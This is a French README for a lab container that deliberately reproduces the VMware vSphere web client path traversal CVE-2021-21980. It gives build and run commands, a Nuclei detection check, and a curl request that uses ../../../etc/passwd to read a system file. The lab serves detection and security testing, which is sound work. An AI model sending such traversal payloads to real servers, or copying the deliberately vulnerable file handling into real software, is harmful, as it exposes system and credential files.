
Laboratoire vulnérable réaliste pour CVE-2021-21980 (traversée de chemin VMware vSphere) - Exploitation réelle de fichiers, pas un serveur simulé
Environnement de test réaliste simulant la vulnérabilité de traversée de chemin du client Web VMware vSphere.
⚠️ AVERTISSEMENT: Environnement de test vulnérable. Ne pas exposer à Internet!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ Lit réellement les fichiers du système de fichiers du conteneur à l'aide d'E/S de fichiers Python
✅ Comportement réaliste - Gère la traversée de chemin comme un vrai vSphere
✅ En-têtes VMware - Inclut Server: VMware-HTTP-Server/1.0
✅ SSL/TLS - Génération de certificat auto-signé
✅ Non codé en dur - Renvoie le contenu réel des fichiers
Dockerfile - Configuration de construction du conteneurserver.py - Application Flask vulnérableCVE-2021-21980.yaml - Modèle de détection NucleiREADME.md - Ce fichierCe laboratoire a été validé avec Nuclei, montrant :
podman stop vcenter-lab && podman rm vcenter-lab